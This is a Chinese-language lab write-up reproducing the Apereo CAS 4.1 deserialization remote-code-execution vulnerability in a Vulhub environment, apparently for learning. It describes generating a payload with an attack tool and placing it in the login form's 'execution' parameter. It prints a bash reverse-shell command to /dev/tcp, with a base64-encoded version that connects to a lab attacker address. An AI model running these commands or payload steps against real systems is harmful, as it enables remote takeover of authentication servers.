{Vulhub漏洞复现(二) Apereo CAS}

admin 2022年4月23日09:24:06评论191 views字数 768阅读2分33秒阅读模式
{Vulhub漏洞复现(二) Apereo CAS}

点击上方蓝字,发现更多精彩


{Vulhub漏洞复现(二) Apereo CAS}

Apereo CAS 4.1

反序列化RCE漏洞

01

漏洞简述

     Apereo CAS是企业级单点登录系统。CAS试图通过Apache Commons Collections库对对象进行反序列化的过程中存在一个问题,该案例引起了RCE漏洞。Apereo Cas一般是用来做身份认证的,所以有一定的攻击面,漏洞的成因是因为key的默认硬编码,导致可以通过反序列化配合Gadget使用。

02

影响版本

         Apereo CAS <= 4.1.7

03

测试环境

    目标机:192.168.234.128

    攻击机:192.168.234.129

04

漏洞复现

 

Vulhub搭建->访问http://192.168.234.128:8080/cas/login->成功


{Vulhub漏洞复现(二) Apereo CAS}


{Vulhub漏洞复现(二) Apereo CAS}

1、利用apereo-cas-attack-1.0-SNAPSHOT-all.jar工具

生成payload

{Vulhub漏洞复现(二) Apereo CAS}

{Vulhub漏洞复现(二) Apereo CAS}

2、抓取登录接口数据包修改execution

参数为生成的payload

{Vulhub漏洞复现(二) Apereo CAS}

{Vulhub漏洞复现(二) Apereo CAS}

3、成功创建


{Vulhub漏洞复现(二) Apereo CAS}

{Vulhub漏洞复现(二) Apereo CAS}

4、反弹shell

/bin/bash -i > /dev/tcp/xx.xx.xx.xx/6666 0<&1 2>&1

需要base64编码

bash -c {echo,L2Jpbi9iYXNoIC1pID4gL2Rldi90Y3AvMTkyLjE2OC4yMzQuMTI5LzY2NjYgMDwmMSAyPiYx}|{base64,-d}|{bash,-i}

生成payload

{Vulhub漏洞复现(二) Apereo CAS}

进行攻击

{Vulhub漏洞复现(二) Apereo CAS}

反弹成功

{Vulhub漏洞复现(二) Apereo CAS}


05

参考链接

https://www.cnblogs.com/cute-puli/p/14648859.html




{Vulhub漏洞复现(二) Apereo CAS}

关注我

获得更多精彩

{Vulhub漏洞复现(二) Apereo CAS}




坚持学习与分享,麻烦各位师傅文章底部给点个“再看”,感激不尽{Vulhub漏洞复现(二) Apereo CAS}

如侵权请私聊公众号删文


原文始发于微信公众号(渗透Xiao白帽):{Vulhub漏洞复现(二) Apereo CAS}

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月23日09:24:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   {Vulhub漏洞复现(二) Apereo CAS}http://cn-sec.com/archives/584586.html

发表评论

匿名网友 填写信息